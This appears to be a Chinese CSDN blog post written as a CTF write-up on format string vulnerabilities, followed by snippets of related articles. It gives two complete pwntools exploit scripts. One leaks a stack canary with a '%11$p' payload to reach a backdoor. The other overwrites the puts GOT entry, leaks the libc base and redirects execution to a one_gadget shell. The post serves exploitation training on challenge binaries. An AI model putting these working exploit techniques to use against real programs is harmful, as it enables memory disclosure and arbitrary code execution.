简单格式化字符串漏洞

已于 2024-03-03 17:48:54 修改
阅读量509 收藏 14
点赞数 6
文章标签: python 开发语言
于 2024-02-19 13:22:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81031055/article/details/136029769
版权

 栈上格式化字符串漏洞泄露内存

checksec指令查看

64位,保护全开

用64位IDA分析,发现有后门

这里我们可以看出只要v6等于v4,就能获取后门。

说一个小知识点:rbp的上面一般就是canary。

从IDA中可以看出,v6就是canary,我们先用格式化字符串去寻找canary。

通过调试会发现偏移为11,此时打印出来的就为canary的地址,然后我们发送v4的时候将canary发送过去就会获取后门

 脚本如下:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
#p=remote("node4.buuoj.cn",29608)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=process("./pwn1")
elf=ELF("./pwn1")
def bug():
	gdb.attach(p)
	pause()
pay=b'%11$p'
#bug()
p.send(pay)
p.recvuntil("0x")
canary=int(p.recv(16),16)
print(str(canary))
pay=str(canary)
bug()
p.send(pay)
p.interactive()

栈上格式化字符串漏洞修改got表

 checksec指令查看 

用64位IDA打开

经过分析之后,我们可以通过格式化字符串漏洞将puts函数的got表改成main函数,这样的话,当程序执行puts函数的时候实际上是执行main函数,就会再次利用read函数以及printf函数。

接下来我们先寻找函数的偏移(指令为:AAAA%p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p,  %p)

 我们会发现偏移位6

首先来修改got表 

这里,我们就会用到 pay=fmtstr_payload(偏移,{要改的内容:改成什么东西})

 接下来再次读入,让程序泄露出llibc基址,然后通过one_gadget库去获取权限

先寻找one_gadget的偏移

 

在这里,我们用到的是第二个(因为rdx以及r15寄存器都为空)

脚本如下:

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn2")
elf=ELF("./pwn2")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def bug():
	gdb.attach(p)
	pause()


pay=fmtstr_payload(6,{elf.got['puts']:0x4011DD})
bug()
p.send(pay)

pay=b'%7$saaaa'+p64(elf.got['read'])
pause()
p.send(pay)

get_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(get_addr))
libc_base=get_addr-libc.sym['read']
print(hex(libc_base))

one_gadget=libc_base+0xe3b01

pause()

pay=fmtstr_payload(6,{elf.got['puts']:one_gadget})
p.send(pay)



p.interactive()

☜.♡.☞
关注
  • 6
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
格式化字符串漏洞利用
04-14
格式化字符串漏洞利用
格式化字符串漏洞自动检测与测试用例生成
04-30
格式化字符串漏洞是一种危害高、影响广的软件漏洞。当前漏洞检测方式存在人工依赖度高、误报率高、检测模型单一、未能充分考虑格式化字符串漏洞特点等多种局限性。针对以上问题,对格式化字符串漏洞特征进行分析,...
linux 格式化字符串漏洞
sky123博客
02-04 2018
格式化字符串漏洞 格式化字符串介绍 常见格式化字符串函数 函数 基本介绍 printf 输出到stdout fprintf 输出到指定FILE流 vprintf 根据参数列表格式化输出到stdout vfprintf 根据参数列表格式化输出到FILE流 sprintf 输出到字符串 snprintf 输出指定字节数到字符串 vsprintf 根据参数列表格式化输出到字符串 vsnprintf 根据参数列表格式化输出指定字节到字符串 常用格式化字符串形式 %[p
【pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5692
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串
格式化字符串漏洞原理及其利用(附带pwn例题讲解)
最新发布
WdIg-2023的博客
04-09 1592
格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。在我们初识C语言的时候,我们经常会使用到printf这之类的函数,printf函数的第一个参数就是一个格式化字符串,就是程序员可以使用占位符,指定格式,这些占位符用来替代后面的变量或者是数据。简单总结就是说,我们可以在一个字符串中,执行某个位置应该输出怎么样的数据,使用占位符代替,在输出的时候函数会自动按照我们指定的格式,寻找参数并以我们预想的形式输出。
格式化字符串漏洞
大草的博客
05-22 2528
格式化字符串漏洞(Format String Vulnerablity),可以用来打印内存内容,修改允许修改的指定地址内存内容,比如栈区域。
详解格式化字符串漏洞利用
weixin_48066554的博客
12-12 5082
详解格式化字符串漏洞利用 ​ 最近看了很多格式化字符串漏洞利用的文章,发现写得都差那么点意思,所以决定自己写一篇,结合实例,好好地把这个知识点捋一捋。
Windows 平台下的堆溢出、格式化字符串漏洞利用技术
04-09
Windows 平台下的堆溢出、格式化字符串漏洞利用技术
格式化字符串漏洞1
08-04
1、 可控的参数 2、 参数类型错误 3、 格式化字符串参数和传入参数不符 1、没有输入参数 2、带有输入参数: 1、 栈上没有定义参数 2、栈上存在定义的参数
格式化字符串漏洞的介绍
01-20
自己学习的时候做的一个ppt,是花了一些心血的,希望对别人能够有所帮助。主要是格式化字符串漏洞的一些介绍,还是挺详细的。
关于在栈上格式化字符串漏洞的利用方法
cainiao78777的博客
03-18 446
先说一下这个思路吧,就是通过两次格式化字符串漏洞,第一次泄露libc_base,以及栈里面的一个地址(任意)第二次修改printf的返回地址为one_gadget去getshell。
格式化字符串漏洞泄露got表
Fzuim的博客
11-20 659
#include <stdio.h> int main() { char s[100]; scanf("%s", s); printf(s); return 0; } 编译命令:gcc -m32 -fno-stack-protector -no-pie -o fmt fmt.c 泄露的payload先贴出来,再理解 # coding:utf-8 from pwn import* from LibcSearcher import * context.log_level = '
格式化字符串漏洞原理理解
Ttw_
03-16 465
在X86结构下,格式化字符串的参数通过栈传递,根据cdecl的调用约定,在进入printf函数前,程序将参数从右往左依次压栈;使用多个%s当作printf的格式化字符串参数即可让程序触发崩溃,原因是%s会让printf从栈中获取一个数字并将其当作一个地址,当该数字不是一个地址时,或该地址受到保护,都会使程序触发崩溃。攻击者使用类似"%s"的格式规范就可以泄露出参数(指针)所指向内存的数据,如果攻击者可以操纵这个参数的值,那么就可以泄露任意地址的内容。我们可以通过%7$p来打印我们输入的一个双字的内容。
格式化字符串漏洞简介
weixin_34356310的博客
03-08 710
explorer · 2015/08/07 16:330x00简介格式化字符串,也是一种比较常见的漏洞类型。会触发该漏洞的函数很有限。主要就是printf还有sprintf,fprintf等等c库中print家族的函数。 我们先来看看printf的函数声明&gt;int printf(const char* format,...) 复制代码这个是每个学过c语言的人一定会知道、会使用的函数。先是一个...
格式化字符串漏洞归纳
yongbaoii的博客
11-26 1016
00
堆上的格式化字符串漏洞
qq_36495104的博客
05-27 1058
在堆上构造栈帧,然后将栈迁移到堆上, 栈帧如下 system_addr bbbb binsh_addr
格式化字符串泄露canary到栈溢出
SsMing的博客
01-11 4247
以ASIS-CTF-Finals-2017 Mary_Morton为例 checksec查看,开了NX保护,还有canary IDA打开 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi int v4; // [rsp+24h] [rbp-Ch] ...
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1384
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
seedlab 格式化字符串漏洞
06-01
Seedlab 的格式化字符串漏洞实验是一个针对 C 语言中常见漏洞的实验,通过这个实验可以帮助学生了解格式化字符串漏洞的原理和防范方法。 在这个实验中,学生需要编写一个程序,该程序接受用户输入的字符串,并将其作为格式化字符串输出。由于用户可以输入任意的字符串,如果程序没有正确过滤用户输入,那么攻击者就可以利用格式化字符串漏洞来执行任意代码,甚至可能导致程序崩溃或者被完全控制。 为了防范格式化字符串漏洞,程序应该对用户输入进行正确的过滤和验证。比如,可以使用限制输入长度、使用固定格式字符串等方式来减少漏洞的风险。此外,在使用格式化字符串输出时,应该尽量避免使用用户输入的字符串作为格式化字符串的一部分,而是使用固定的格式字符串和用户输入的参数来进行输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值